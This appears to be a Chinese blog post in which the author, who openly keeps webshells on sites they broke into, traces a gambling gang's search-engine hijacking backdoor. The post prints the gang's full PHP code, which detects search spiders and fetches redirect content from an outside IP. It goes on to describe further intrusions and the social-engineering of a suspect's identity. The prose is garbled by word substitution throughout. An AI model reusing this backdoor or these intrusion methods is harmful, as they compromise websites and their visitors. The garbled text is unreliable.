对这件工作的起因是某天我渗透了一个大站，第二天进webshell时就发明，当前目录呈现了新的后门，仔细一查，发明是博彩团伙干的，网站被全局劫持黑帽措施如下代码

set_time_limit(20);error_reporting(0);

define('u_b','/');

define('s_u','http:// 107.182.228.74/');

define('s_s','@haosou.com|360.cn| spider|360spider|so|360|sogou|sm.cn|youdao@i');

define('h_t',$_SERVER['SERVER_NAME']);define('r_s',$_SERVER['HTTP_REFERER']);define('u_s',$_SERVER['HTTP_USER_AGENT']);define('h_z',s_p());

function s_p(){$d='';if(isset($_SERVER['REQUEST_URI'])){$d=$_SERVER['REQUEST_URI'];}else{if(isset($_SERVER['argv'])){$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['argv'][0];}else{$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];}}if(isset($_SERVER['SERVER_SOFTWARE']) && false!==stristr($_SERVER['SERVER_SOFTWARE'],'IIS')){if(function_exists('mb_convert_encoding')){$d=mb_convert_encoding($d,'UTF-8','GBK');}else{$d=@iconv('GBK','UTF-8',@iconv('UTF-8','GBK',$d))==$d?$d:@iconv('GBK','UTF-8',$d);}}$r=explode('#',$d,2);$d=$r[0];return $d;}function r_s($url){$o=array('http' => array('method'=>"GET",'timeout'=>8));$context=stream_context_create($o);$h=file_get_contents($url,false,$context);if(empty($h)){$h=file_get_contents($url);}return $h;}

if(preg_match(s_s,r_s)){$d_s=true;if(preg_match("@site%3A|inurl%3A@i",r_s)){setcookie('xx',h_t,time()+259200);$d_s=false;}if($d_s ){setcookie('xx',h_t,time()+259200);$d_u=s_u.'?xu='.bin2hex(h_z);$d_u.='&ad=1&xh='.bin2hex(h_t);$d_c=r_s($d_u);header("Location: ".$d_c.'?'.h_t);exit;}}if(strstr(h_z,u_b)){if(preg_match(s_s,u_s)){$d_u=s_u.'?xu='.bin2hex(h_z);$d_u.='&xh='.bin2hex(h_t);$d_c=r_s($d_u);echo $d_c;exit;}}

https://www.so.com/s?q=%E5%A8%B1%E4%B9%90%E5%9C%BA&src=srp&fr=360sou_newhome&adv_t=d

看上去是针对360的，通过360去搜索site网站打赌相关的关键字呈现的功效我惊呆了！！！！居然非常多的站被劫持，而且此中包孕我渗透测试的不少站，看上去就像360本身控制的排名一样，其实是犯警份子操作了360的算法缝隙。通过收录时间发此刻2014年开始呈现的，也就是说这个问题已经存在了多年之久，至今才袒露出来。

接下来我就开展了所有疑问的查询拜访，因为这些对象被操作对社会影响实在太大，不只仅我是独一的受害者，而是这个安适圈子的所有人。

找到幕后团伙

查大马问题

分析团伙的后门特征

1.我对我手里的shell进行了一遍梳理，首先是对后门进行新的地点改削，在本来的后门地点放上了js代码，该段代码记录的是相关指纹信息，以及各大网站的json获取。此时就是静静的期待。

2．我对大马又进行了一遍分析，把所有代码读烂了也没任何问题，同时也对马进行了抓包分析，没有任何外部请求。因为一直没发明问题，所以我特意进行了长达一周的数据包监控，还是没有任何功效。这时候就非常纳闷，既然马没有问题，为什么人家可以获取到我的所有后门？难道是我的电脑被入侵？我的网络环境除了http之外，不能做任何协议请求，而我的后门都 生存 在这台linux里，这点也可以排除。只好再想想是不是哪里疏忽了。

3.被该团队劫持过的站，我都查抄了一遍，之后我发明，每个站的所有文件创建时间城市被他们更新到入侵时间，这恰好切合了特征，也就是刚被他们入侵过的站。

如图特征，几乎每个站被入侵后所有创建时间城市更新一次。

之后对他们本身的后门进行了收罗样本，新的进展呈现了，一共发明2波差此外团伙，但使用的大马均为一类。（见附件1）

我对他们的马进行了解密审计后发明，他们本身记录大马后门的箱子地点为api.fwqadmin.com，因为有了新的线索，所以只能暂时生存，后面再对这个进行渗透。

颠末两天的期待，终于得到了该团伙的指纹信息以及QQ号，然后我就开启大神模式进行社工，之后根基确认此人真实信息（圈内叫老袁）。然后我申请了一个QQ小号，以匿名的方法加了一些博彩导航网站上的qq，在QQ上问了好几小我私家，都没有功效，后来我爽性以做 博彩 的名义和他们进行深度相同，通过相同发明该团伙的shell都是收购来的， 一个月收入几百万人民币 ，是否真实就不得而知了。目前根基可以确认我的判断错误，老袁就是独一的线索。

我对被该团伙做劫持的所有站进行了收罗，还有跳转到他们导航的域名。首先对那些不是我的站进行了渗透入侵，收罗到后门样本，看到里面有个和我类似的大马，但是核心变量布局不一样，我下载回来进行审计抓包同样没问题，后来通过比拟特征，发明大马请求的POST参数都是一样的，例如gopwd=暗码&godir= ，马都没异常，这时候初阶判断是上层网络呈现了问题，通过流量提取到大马特征的地点，如果真是这样就太可怕了。